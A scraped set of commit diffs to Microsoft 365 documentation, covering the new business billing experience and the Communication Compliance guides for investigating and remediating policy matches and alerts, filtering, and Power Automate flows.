https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-experience-overview.md

+

+ Title: "Overview of the new Microsoft billing experience for business subscriptions"

+f1.keywords:

+- CSH

++++

+audience: Admin

++

+ms.localizationpriority: medium

+

+- Tier1

+- scotvorg

+- highpri

+- M365-subscription-management

+- Adm_O365

+

+- commerce_billing

+- VSBFY23

+- AdminTemplateSet

+search.appverid: MET150

+

+description: "Learn about the new billing experience for business subscription in the Microsoft 365 admin center."

Last updated : 07/18/2023++

+# Overview of the new Microsoft billing experience for business subscriptions

+

+Microsoft has introduced new features that expand and improve the billing experience for our business customers. This article describes the major features weΓÇÖve added, and the changes weΓÇÖve made to the billing experience.

+

+If youΓÇÖre a Cloud Service Provider (CSP), see [New commerce license-based overview - Partner Center](/partner-center/new-commerce-license-based).

+

+## The Microsoft Customer Agreement

+

+The Microsoft Customer Agreement (MCA) is a new purchasing agreement that simplifies the experience of buying Microsoft products and services. The MCA is a fully digital agreement that doesnΓÇÖt expire and is automatically updated when you buy new products and services. To learn more about the MCA and for a list of frequently asked questions, see [Microsoft Customer Agreement | Microsoft Licensing](https://www.microsoft.com/Licensing/how-to-buy/microsoft-customer-agreement).

+

+## Billing accounts

+

+You now have a *billing account* associated with your organization. This billing account is used to manage your account settings, invoices, payment methods, and purchases from Microsoft. Together with the MCA, you can use your billing account to buy products and services across different surfaces, including directly from Microsoft, through partners, and through field sales agents. You might have more than one billing account, depending on the types of agreement you signed with us.

+

+Billing accounts have special roles that you can assign to users in your organization. These roles let users do things like assign billing account permissions to other users, edit accounts, sign agreements, and view accounts.

+

+For more information, see [Understand your Microsoft business billing account](manage-billing-accounts.md).

+

+## Billing profiles

+

+You also now have a *billing profile* associated with your billing account. A billing profile contains payment method and invoice information and is used to pay for the products that you buy from us. If you have more than one billing profile, each billing profile is invoiced separately.

+

+Like billing accounts, billing profiles also have special roles that you can assign to users in your organization. These roles let users do things like assign billing profile roles, edit the billing profile group, use the billing profile in a purchase, pay bills, and view the billing profile group.

+

+For more information, see [Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md).

+

+## Additional changes

+

+The following list describes other changes weΓÇÖve made to the billing experience.

+

+- **New invoice**—The format of the invoice has changed, and you now receive a separate invoice for each billing profile in your billing account. For more information, see [Understand your bill or invoice](billing-and-payments/understand-your-invoice.md).

+- **More billing frequencies**—Depending on the product or service you buy, you can now choose to pay for your subscription monthly, yearly, or every three years.

+- **More subscription lengths**—Depending on the product or service you buy, you can choose a subscription length of one month, one year, or three years.

+- **New cancellation policy**—You can now only cancel and receive a prorated credit or refund if you cancel within seven days after the start or renewal of your subscription. If you cancel during this limited time window, the prorated amount is either credited towards your next invoice or returned to you in the next billing cycle. For more information, see [Cancel your Microsoft business subscription](subscriptions/cancel-your-subscription.md).

+- **New scheduling for license changes**—You can now choose to increase or decrease the number of licenses you have for a subscription on the next subscription renewal date.

+- **New billing account selector**—If you have more than one billing account, you can select **Change billing accoun**t on the **Purchase services** page to use a different billing account to buy new products and services.

+

+## Related articles

+

+[Understand your Microsoft business billing account](manage-billing-accounts.md) (article)\

+[Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md) (article)\

+[Understand your bill or invoice](billing-and-payments/understand-your-invoice.md) (article)\

+[How to pay for your Microsoft business subscription with a billing profile](billing-and-payments/pay-for-subscription-billing-profile.md) (article)

compliance

Communication Compliance Alerts Best Practices

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-alerts-best-practices.md

f1.keywords:

Previously updated : 04/14/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:

Messages in alerts include [sentiment evaluation](communication-compliance-inves

## Report messages as misclassified

-[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#remediate-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future.

+[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#review-and-mediate-policy-matches-and-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future.

## Filter out specific senders by using a condition

compliance

Communication Compliance Investigate Remediate

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-investigate-remediate.md

f1.keywords:

Previously updated : 02/07/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:

After you've configured your [communication compliance policies](/microsoft-365/

- The *Communication Compliance Analysts* or the *Communication Compliance Investigators* role group - Reviewer in the policy that is associated with the alert

-After you establish required permissions, follow the workflow instructions below to investigate and remediate alert issues.

+After you establish required permissions, follow the workflow instructions below to investigate and remediate issues.

[!INCLUDE [purview-preview](../includes/purview-preview.md)]

-## Investigate alerts

+## Investigate policy matches and alerts

-The first step to investigate issues detected by your policies is to review alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate alerts, depending on how you prefer to view alert grouping:

+The first step to investigate issues detected by your policies is to review policy matches and alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate policy matches and alerts:

-- **Communication compliance policy page**: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select **Communication compliance** to display the communication compliance **Policy** page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of alerts that need review, the number of escalated and resolved items, status of the policy, and the date and Coordinated Universal Time (UTC) of the last policy check. Select a policy to display all pending alerts for matches to the policy, then select a specific alert to launch the policy details page and to start remediation actions.-- **Alerts**: Navigate to **Communication compliance** > **Alerts** to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. To start remediation actions, select the policy associated with the alert to launch the **Policy details** page. From the **Policy details** page, you can review a summary of the activities on the **Overview** page, review and act on alert messages on the **Pending** tab, or review the history of closed alerts on the **Resolved** tab.-- **Reports**: Navigate to **Communication compliance** > **Reports** to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions.

+- **Policy page**: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select **Communication compliance** to display the communication compliance **Policy** page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of policy matches that need review (**Items pending review** column), the number of escalated and resolved items, status of the policy, the date and Coordinated Universal Time (UTC) of the last policy modification, and the UTC for the last policy scan. Select a policy to display all pending policy matches, and then select a specific policy match to launch the policy details page and start remediation actions.

+- **Alerts page**: Go to **Communication compliance** > **Alerts** to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. An alert is not the same thing as a policy match. An alert generally consists of multiple policy matches, not just one policy match. After the required number of policy matches is met for a particular alert, the alert is created and email is sent to the alert recipient.

-> [!NOTE]

-> If you select the **Pending** tab, you may notice that the count of policy matches in the **Pending** tab heading doesn't match the number of messages in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the **Pending** tab. Refresh the page to update both.

+ To start remediation actions, select the policy associated with the alert to launch the **Policy details** page. From the **Policy details** page, you can review a summary of the activities on the **Overview** page, review and act on policy matches on the **Pending** tab, or review the history of closed policy matches on the **Resolved** tab.

+

+ > [!NOTE]

+ > You may notice that the count of policy matches in the **Pending** tab heading doesn't match the number of policy matches in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the **Pending** tab. Refresh the page to update both.

+

+- **Reports page**: Go to **Communication compliance** > **Reports** to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions.

+

+> [!TIP]

+> Sometimes it's useful to quickly review policy settings without opening a policy. For example, if you're testing multiple policies with different conditions, you might want to save time by reviewing conditions for each policy to determine risk before opening the policy. You can do this by selecting the **Policy settings** button ![Policy settings button](../media/communication-compliance-policy-settings-button.png), which opens a panel where you can view the policy settings. If you're a member of the Communication Compliance or Communication Compliance Admins role group, you can view and change settings from the panel. If you're a member of the Communication Compliance Investigators or Communication Compliance Analysts role group, you can view settings but you can't change them.

### Using filters

-The next step is to sort the messages so it's easier for you to investigate alerts. From the **Policy details** page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the alert message queue that you can configure for specific filter values.

+The next step is to sort the messages so it's easier for you to investigate. From the **Policy details** page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the message queue that you can configure for specific filter values.

+

+Key filters (the **Body/Subject**, **Date**, **Sender**, and **Tags** filters) are always displayed on the **Pending** and **Resolved** tabs to make it easy to access those filters.

-For the date filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC.

+For the **Date** filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC.

#### Filter details

-Communication compliance filters allow you to filter and sort alert messages for quicker investigation and remediation actions. Filtering is available on the **Pending** and **Resolved** tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections.

+Communication compliance filters allow you to filter and sort messages for quicker investigation and remediation actions. Filtering is available on the **Pending** and **Resolved** tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections.

+| **Body/Subject** | The message body or subject. You can use this filter to search for keywords or a keyword phrase in the body or subject of the message. The subject appears in the **Subject** column for email messages. For Teams messages, nothing appears in the **Subject** column.|

| **Date** | The date the message was sent or received by a user in your organization. To filter for a single day, select a date range that starts with the day you want results for and end with the following day. For example, if you wanted to filter results for 9/20/2020, you would choose a filter date range of 9/20/2020-9/21/2020.| | **File class** | The class of the message based on the message type, either *message* or *attachment*. | | **Has attachment** | The attachment presence in the message. | | **Item class** | The source of the message based on the message type, email, Microsoft Teams chat, Bloomberg, etc. For more information, see [Item Types and Message Classes](/office/vba/outlook/concepts/forms/item-types-and-message-classes). |

-| **Recipient domains** | The domain to which the message was sent; typically your Microsoft 365 subscription domain by default. |

+| **Recipient domains** | The domain to which the message was sent; this is typically your Microsoft 365 subscription domain by default. |

-| **Subject/Title** | The message subject or chat title. |

| **Tags** | The tags assigned to a message, either *Questionable*, *Compliant*, or *Non-compliant*. | | **Language** | The detected language of text in the message. The message is classified according to the language of the majority of the message text. For example, for a message containing both German and Italian text, but the majority of text is German, the message is classified as German (DE). For a list of supported languages, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). You can also filter by more than one language. For example, to filter messages classified as German and Italian, enter 'DE,IT' (the 2-digit language codes) in the Language filter search box. To view the detected language classification for a message, select a message, select View message details, and scroll to the *EmailDetectedLanguage* field. | | **Escalated To** | The user name of the person included as part of a message escalation action. |

The following table outlines filter details:

4. On the **Policy** page, select either the **Pending** or **Resolved** tab to display the items for filtering.

-5. Select the **Filters** control to open the **Filters** details page.

+5. Select the **Filters** button to open the **Filters** details page.

-6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters, including *Date*, *Sender*, *Subject/Title*, *Classifiers*, *Language*, and more.

+6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters.

7. If you'd like to save the filter selected as the default filter, select **Save as default**. If you want to use this filter as a saved filter, select **Done**.

-8. If you'd like to save the selected filters as a filter query, select **Save the query** control after you've configured at least one filter value. Enter a name for the filter query and select **Save**. This filter is available to use for only this policy and is listed in the **Saved filter queries** section of the **Filters** details page.

+8. If you'd like to save the selected filters as a filter query, select the **Save the query** button after you've configured at least one filter value. Enter a name for the filter query and select **Save**. This filter is available to use for only this policy and is listed in the **Saved filter queries** section of the **Filters** details page.

- ![Communication compliance filter detail controls](../media/communication-compliance-filter-detail-controls.png)

+ ![Communication compliance filter detail buttons](../media/communication-compliance-filter-detail-controls.png)

-## Remediate alerts

+## Review and mediate policy matches and alerts

-No matter where you start to review alerts or the filtering you configure, the next step is to take action to remediate the alert. Start your alert remediation using the following workflow on the **Policy** or **Alerts** pages.

+No matter where you start to review policy matches or alerts or the filtering you configure, the next step is to take remediation action. Start your remediation using the following workflow on the **Policy** or **Alerts** pages.

### Step 1: Examine the message basics

- Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the **Report as misclassified** control to share misclassified content with Microsoft, immediately resolve the alert, and remove from the pending alert queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the **Tag as** or **Escalate** controls to assign a tag to applicable messages or to send messages to a designated reviewer.

+ Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the **Report as misclassified** button to share misclassified content with Microsoft, immediately resolve the issue, and remove from the **Pending** queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the **Tag as** or **Escalate** buttons to assign a tag to applicable messages or to send messages to a designated reviewer.

-![Communication compliance remediation controls](../media/communication-compliance-remediation-controls.png)

+![Communication compliance remediation buttons](../media/communication-compliance-remediation-controls.png)

### Step 2: Examine the message details After reviewing the message basics, now you can open a message to examine the details and determine further remediation actions. Select a message to view the complete message header and body information. Several different options and views are available to help you decide the proper course of action: -- **Sentiment**: Messages in alerts now include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as *Positive*, *Negative*, or *Neutral* sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with *Positive* sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other message alerts. The message sentiment is displayed in the **Sentiment column** and is enabled in the default view.-- **Attachments**: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the Pending alerts dashboard for a policy. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels).

+- **Sentiment**: Messages include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as *Positive*, *Negative*, or *Neutral* sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with *Positive* sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other messages. The message sentiment is displayed in the **Sentiment column** and is enabled in the default view.

+- **Attachments**: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the **Pending** tab. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels).

- **Source**: This view is the standard message view commonly seen in most web-based messaging platforms. The header information is formatted in the normal style and the message body supports imbedded graphic files and word-wrapped text. If [optical character recognition (OCR)](/microsoft-365/compliance/communication-compliance-policies#optical-character-recognition-ocr) is enabled for the policy, images containing printed or handwritten text that match policy conditional are viewed as a child item for the associated message in this view. - **Plain text**: Text view that displays a line-numbered text-only view of the message and includes keyword highlighting in messages and attachments for sensitive info type terms, terms identified by built-in classifiers assigned to a policy, or for terms included in a dedicated keyword dictionary assigned to a policy. Keyword highlighting, which is currently available for English language only, can help direct you to the area of interest in long messages and attachments. In some cases, highlighted text might be only in attachments for messages matching policy conditions. Embedded files aren't displayed and the line numbering in this view is helpful for referencing pertinent details among multiple reviewers.-- **Conversation**: Available for Microsoft Teams chat messages, this view displays up to five messages before and after an alert message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the conversation window. When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the alert message is identified.

+- **Conversation**: Available for Microsoft Teams chat messages, this view displays up to five messages before and after a message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the Conversation window. When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the message is identified.

- **User history**: User history view displays all other alerts generated by any communication compliance policy for the user sending the message.-- **Pattern detected notification**: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The *Pattern detected* notification is displayed in the alert details and raises attention to the alert. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the alert as appropriate.-- **Translation**: This view automatically converts alert message text to the language configured in the *Displayed language* setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The *Translation* view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the *Translator Language List* are supported in the *Translation* view.

+- **Pattern detected notification**: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The *Pattern detected* notification is displayed in the message details and raises attention to the message. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the message as appropriate.

+- **Translation**: This view automatically converts message text to the language configured in the *Displayed language* setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The *Translation* view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the *Translator Language List* are supported in the *Translation* view.

### Step 3: Decide on a remediation action

-Now that you've reviewed the details of the message for the alert, you can choose several remediation actions:

+After reviewing the details of the message, you can choose several remediation actions:

-- **Resolve**: Selecting the **Resolve** control immediately removes the message from the **Pending alerts** queue and no further action can be taken on the message. By selecting **Resolve**, you've essentially closed the alert without further classification. All resolved messages are displayed in the **Resolved** tab.-- **Report as misclassified**: You can always resolve a message as misclassified at any point during the message review workflow. Misclassified signifies that the alert was non-actionable or that the alert was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the **Resolved** tab.-- **Power Automate**: Use a Power Automate flow to automate process tasks for an alert message. By default, communication compliance includes the *Notify manager when a user has a communication compliance alert* flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the **Step 5: Consider Power Automate flows** section in this article.-- **Tag as**: Tag the message as *compliant*, *non-compliant*, or as *questionable* as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter policy alerts for escalations or as part of other internal review processes. After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue.-- **Notify**: You can use the **Notify** control to assign a custom notice template to the alert and to send a warning notice to the user. Choose the appropriate notice template configured in the **Communication compliance settings** area and select **Send** to email a reminder to the user that sent the message and to resolve the issue.-- **Escalate**: Using the **Escalate** control, you can choose who else in your organization should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message alert. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review.-- **Escalate for investigation**: Using the **Escalate for investigation** control, you can create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. You'll provide a name and notes for the new case, and user who sent the message matching the policy is automatically assigned as the case custodian. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Viva Engage messages when you open a new eDiscovery (Premium) case for a user.-- **Remove message in Teams**: Using the **Remove message in Teams** control, you can block potentially inappropriate messages and content identified in alerts from Microsoft Teams channels and 1:1 and group chats. This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal.

+- **Resolve**: Selecting the **Resolve** button immediately removes the message from the **Pending** queue and no further action can be taken on the message. When you select **Resolve**, you close the message without further classification. All resolved messages are displayed in the **Resolved** tab.

+- **Report as misclassified**: You can resolve a message as misclassified at any point during the message review workflow. "Misclassified" signifies that the message is non-actionable or that the message was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends the message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the **Resolved** tab.

+- **Power Automate**: Use a Power Automate flow to automate process tasks for a message. By default, communication compliance includes the *Notify manager when a user has a communication compliance alert* flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the **Step 5: Consider Power Automate flows** section in this article.

+- **Tag as**: Tag the message as *compliant*, *non-compliant*, or as *questionable* as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter messages for escalations or as part of other internal review processes. After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue.

+- **Notify**: Use the **Notify** button to assign a custom notice template to the message and send a warning notice to the user. Choose the appropriate notice template configured in the **Communication compliance settings** area and select **Send** to email a reminder to the user that sent the message and to resolve the issue.

+- **Escalate**: Use the **Escalate** button to choose other people in your organization who should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review.

+- **Escalate for investigation**: Use the **Escalate for investigation** button to create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. Provide a name and notes for the new case. The custodian is automatically filled in for you. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Yammer messages when you open a new eDiscovery (Premium) case for a user.

+- **Remove message in Teams**: Use the **Remove message in Teams** button to block potentially inappropriate messages and content identified in messages from Microsoft Teams channels and 1:1 and group chats. This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal.

### Step 4: Determine if message details should be archived outside of communication compliance

-Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the **Download** control automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365.

+Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the **Download** button automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365.

### Step 5: Consider Power Automate flows

The following Power Automate template is provided to customers to support proces

#### Create a Power Automate flow

-To create a Power Automate flow from a recommended default template, you'll use the **Manage Power Automate flows** option from the **Automate** control when working directly in an alert. To create a Power Automate flow with **Manage Power Automate flows**, you must be a member of at least one communication compliance role group.

+To create a Power Automate flow from a recommended default template, you'll use the **Manage Power Automate flows** option from the **Automate** button when working directly in an alert. To create a Power Automate flow with **Manage Power Automate flows**, you must be a member of at least one communication compliance role group.

Follow these steps to create a Power Automate flow from a default template:

3. Select **Power Automate** from the alert action menu. 4. On the **Power Automate** page, select a default template from the **Communication compliance templates you may like** section on the page. 5. The flow lists the embedded connections needed for the flow and displays if the connection statuses are available. If needed, update any connections that aren't displayed as available. Select **Continue**.

-6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the **Show advanced options** control and configuring the available properties for the flow component.

+6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the **Show advanced options** button and configuring the available properties for the flow component.

7. If needed, add any additional steps to the flow by selecting the **New step** button. In most cases, this change shouldn't be needed for the recommended default templates. 8. Select **Save draft** to save the flow for further configuration later, or select **Save** to complete the configuration for the flow.

-9. Select **Close** to return to the Power Automate flow page. The new template will be listed as a flow on the **My flows** tab and is automatically available from the Power Automate control for the user that created the flow when working with communication compliance alerts.

+9. Select **Close** to return to the Power Automate flow page. The new template will be listed as a flow on the **My flows** tab and is automatically available from the Power Automate button for the user that created the flow when working with communication compliance alerts.

#### Share a Power Automate flow

-By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the **Power Automate** control when working directly in an alert.

+By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the **Power Automate** button when working directly in an alert.

To share a Power Automate flow, you must be a member of at least one communication compliance role group.

Follow these steps to share a Power Automate flow:

#### Edit a Power Automate flow

-If you need to edit a flow, you'll use the **Power Automate** control when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group.

+If you need to edit a flow, you'll use the **Power Automate** button when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group.

Follow these steps to edit a Power Automate flow:

#### Delete a Power Automate flow

-If you need to delete a flow, use the **Power Automate** control when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group.

+If you need to delete a flow, use the **Power Automate** button when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group.

Follow these steps to delete a Power Automate flow:

Notices templates are custom email templates where you can define the following

|**Field**|**Required**| **Details** | |:--|:--|:--| |**Template name** | Yes | Friendly name for the notice template that you'll select in the notify workflow during remediation, supports text characters. |

-| **Sender address** | Yes | Address of one or more users or groups that send the message to the user with a policy match, selected from the Active Directory for your subscription. |

+| **Sender address** | Yes | Address of one or more users or groups that sent the message to the user with a policy match, selected from the Active Directory for your subscription. |

If you'd like to create more than a simple text-based email message for notifica

## Unresolve messages

-When messages are resolved, they're removed from the **Pending** tab view and displayed in the **Resolved** tab. Investigation and remediation actions aren't available for messages in the *Resolved* view. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the unresolve command feature move one or more messages from the *Resolved* view back to the *Pending* view.

+When messages are resolved, they're removed from the **Pending** tab and displayed in the **Resolved** tab. Investigation and remediation actions aren't available for messages in the *Resolved* tab. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the **Unresolve** command to move one or more messages from the **Resolved** tab back to the **Pending** tab.

-Follow these steps to unresolve messages:

+To unresolve a message:

1. Sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for a user assigned to the *Communication Compliance Analysts* or *Communication Compliance Investigators* role groups in your Microsoft 365 organization. 2. In the Microsoft Purview compliance portal, go to **Communication compliance**.

-3. Select the **Policies** tab and then select a policy that contains the resolved alert message, double-click to open the **Policy** page.

+3. Select the **Policies** tab, select a policy that contains the resolved message, and then double-click to open the **Policy** page.

4. On the **Policy** page, select the **Resolved** tab.

-5. On the **Resolved** tab, select one or more messages to move back to *Pending*.

-6. On the command bar, select **Unresolve**.

-7. On the **Unresolve item** pane, add any comments applicable to the unresolve action and select **Save** to move the item back to *Pending*.

+5. On the **Resolved** tab, select one or more messages.

+6. Select **Unresolve**.

+7. On the **Unresolve item** pane, add any applicable comments, and then select **Save**.

8. Select the **Pending** tab to verify the selected items are displayed.

compliance

Communication Compliance Policies

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-policies.md

f1.keywords:

Previously updated : 06/20/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:

When configured for an insider risk management policy, a dedicated policy named

Users that send 5 or more messages classified as potentially risky within 24 hours are automatically brought in-scope for insider risk management policies that include this option. Once in-scope, the insider risk management policy detects potentially risky activities configured in the policy and generates alerts as applicable. It may take up to 48 hours from the time risky messages are sent until the time a user is brought in-scope in an insider risk management policy. If an alert is generated for a potentially risky activity detected by the insider risk management policy, the triggering event for the alert is identified as being sourced from the communication compliance risky activity.

